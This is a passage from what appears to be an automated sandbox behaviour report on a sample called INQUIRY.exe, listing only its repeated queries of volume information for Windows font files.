                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
